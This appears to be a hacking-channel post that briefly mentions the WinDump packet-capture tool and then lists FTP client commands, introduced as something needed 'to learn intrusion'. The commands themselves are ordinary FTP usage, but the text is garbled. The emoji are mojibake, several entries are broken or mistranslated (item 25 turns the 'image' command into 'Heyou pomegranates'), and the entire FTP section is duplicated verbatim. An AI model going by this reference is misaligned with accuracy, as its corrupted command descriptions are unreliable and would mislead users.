Windows xp example users can use this tcp / ip tool to capture packets in tcp / ip connection:
WinDumpxp.exe still needs to download this library Packet95.exe before use
Windows NT user version
WinDump.exe PacketNT.exe
(can try on win vist /xp/7 old v)
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦The use of Ftp command
To learn intrusion, FTP commands are indispensable. Here are some good-looking FTP commands:
The FTP command is one of the most frequently used commands by Internet users. Whether you use FTP under DOS or UNIX operating systems, you will encounter a large number of FTP internal commands. Familiar and flexible application of FTP's internal commands can greatly facilitate users and receive more with less effort. The command line format of FTP is: ftp -v -d -i -n -g [hostname], where
-v Display all the response information of the remote server;
-n Restrict automatic login of ftp, that is, not use;
.n etrc file;
-d Use debugging mode;
-g Cancel global file name.
The internal commands used by ftp are as follows (square brackets indicate optional):
1.! [Cmd [args]: Execute interactive sh \ * ll in the local machine, and exit to return to the ftp environment, such as:! Ls * .zip.
2. $ macro-ame [args]: execute macro definition macro-name.
3. account [password]: Provide the supplementary password needed to access system resources after successfully logging into the remote system.
4. append local-file [remote-file]: append the local file to the remote system host. If the remote system file name is not specified, the local file name is used.
5. ascii: Use ascii type transmission method.
6. bell: The computer rings once after each command is executed.
7. Bin: Use the binary file transfer method.
8. bye: Exit the FTP session.
9. case: When using mget, convert uppercase to lowercase letters in the remote host file name.
10. cd remote-dir: Enter the remote host directory.
11. cdup: Enter the parent directory of the remote host directory.
12. chmod mode file-name: Set the access mode of the remote host file file-name to mode, for example: chmod 777 a.out.
13. close: interrupt the ftp session with the remote server (corresponding to open).
14. cr: When using ascii to transfer files, convert the carriage return and line feed into a return line.
15. delete remote-file: delete the remote host file.
16. debug [debug-values]: Set the debugging mode to display each command sent to the remote host, such as: deb up 3, if set to 0, it means to cancel the debug.
17. dir [remote-dir] [local-file]: Display the remote host directory and save the result in the local file local-file.
18. Disconnection: Same as close.
19. Form format: Set the file transmission mode to format, and the default is file mode.
20. get remote-file [local-file]: transfer the remote-file of the remote host to the local-file of the local hard disk.
21. glob: Set the file name extension of mdelete, mget, mput. By default, the file name is not extended.
22. Hash: Each transmission of 1024 bytes displays a hash symbol (#).
23. help [cmd]: Display help information of ftp internal command cmd, such as: help get.
24. idle [seconds]: Set the sleep timer of the remote server to [seconds] seconds.
25. The image of Heyou pomegranates (scrambled together) is the same as binary).
26. lcd [dir]: switch the local working directory to dir.
27. ls [remote-dir] [local-file]: Display the remote-dir of the remote directory and store it in the local file local-file.
28. macdef macro-name: Define a macro. When a blank line under macdef is encountered, the macro definition ends.
29. mdelete [remote-file]: delete the remote host file.
30. mdir remote-files local-file: similar to dir, but you can specify multiple remote files, such as: mdir * .o. *. Zipoutfile.
31. mget remote-files: transfer multiple remote files.
32. mkdir dir-name: build a directory in the remote host.
33. mls remote-file local-file: Same as nlist, but multiple file names can be specified.
34. mode [modename]: Set the file transfer mode to modename, and the default is stream mode.
35. modtime file-name: displays the last modification time of the remote host file.
36. mput local-file: Transfer multiple files to a remote host.
π¦The use of Ftp command
To learn intrusion, FTP commands are indispensable. Here are some good-looking FTP commands:
The FTP command is one of the most frequently used commands by Internet users. Whether you use FTP under DOS or UNIX operating systems, you will encounter a large number of FTP internal commands. Familiar and flexible application of FTP's internal commands can greatly facilitate users and receive more with less effort. The command line format of FTP is: ftp -v -d -i -n -g [hostname], where
-v Display all the response information of the remote server;
-n Restrict automatic login of ftp, that is, not use;
.n etrc file;
-d Use debugging mode;
-g Cancel global file name.
The internal commands used by ftp are as follows (square brackets indicate optional):
1.! [Cmd [args]: Execute interactive sh \ * ll in the local machine, and exit to return to the ftp environment, such as:! Ls * .zip.
2. $ macro-ame [args]: execute macro definition macro-name.
3. account [password]: Provide the supplementary password needed to access system resources after successfully logging into the remote system.
4. append local-file [remote-file]: append the local file to the remote system host. If the remote system file name is not specified, the local file name is used.
5. ascii: Use ascii type transmission method.
6. bell: The computer rings once after each command is executed.
7. Bin: Use the binary file transfer method.
8. bye: Exit the FTP session.
9. case: When using mget, convert uppercase to lowercase letters in the remote host file name.
10. cd remote-dir: Enter the remote host directory.
11. cdup: Enter the parent directory of the remote host directory.
12. chmod mode file-name: Set the access mode of the remote host file file-name to mode, for example: chmod 777 a.out.
13. close: interrupt the ftp session with the remote server (corresponding to open).
14. cr: When using ascii to transfer files, convert the carriage return and line feed into a return line.
15. delete remote-file: delete the remote host file.
16. debug [debug-values]: Set the debugging mode to display each command sent to the remote host, such as: deb up 3, if set to 0, it means to cancel the debug.
17. dir [remote-dir] [local-file]: Display the remote host directory and save the result in the local file local-file.
18. Disconnection: Same as close.
19. Form format: Set the file transmission mode to format, and the default is file mode.
20. get remote-file [local-file]: transfer the remote-file of the remote host to the local-file of the local hard disk.
21. glob: Set the file name extension of mdelete, mget, mput. By default, the file name is not extended.
22. Hash: Each transmission of 1024 bytes displays a hash symbol (#).
23. help [cmd]: Display help information of ftp internal command cmd, such as: help get.
24. idle [seconds]: Set the sleep timer of the remote server to [seconds] seconds.
25. The image of Heyou pomegranates (scrambled together) is the same as binary).
26. lcd [dir]: switch the local working directory to dir.
27. ls [remote-dir] [local-file]: Display the remote-dir of the remote directory and store it in the local file local-file.
28. macdef macro-name: Define a macro. When a blank line under macdef is encountered, the macro definition ends.
29. mdelete [remote-file]: delete the remote host file.
30. mdir remote-files local-file: similar to dir, but you can specify multiple remote files, such as: mdir * .o. *. Zipoutfile.
31. mget remote-files: transfer multiple remote files.
32. mkdir dir-name: build a directory in the remote host.
33. mls remote-file local-file: Same as nlist, but multiple file names can be specified.
34. mode [modename]: Set the file transfer mode to modename, and the default is stream mode.
35. modtime file-name: displays the last modification time of the remote host file.
36. mput local-file: Transfer multiple files to a remote host.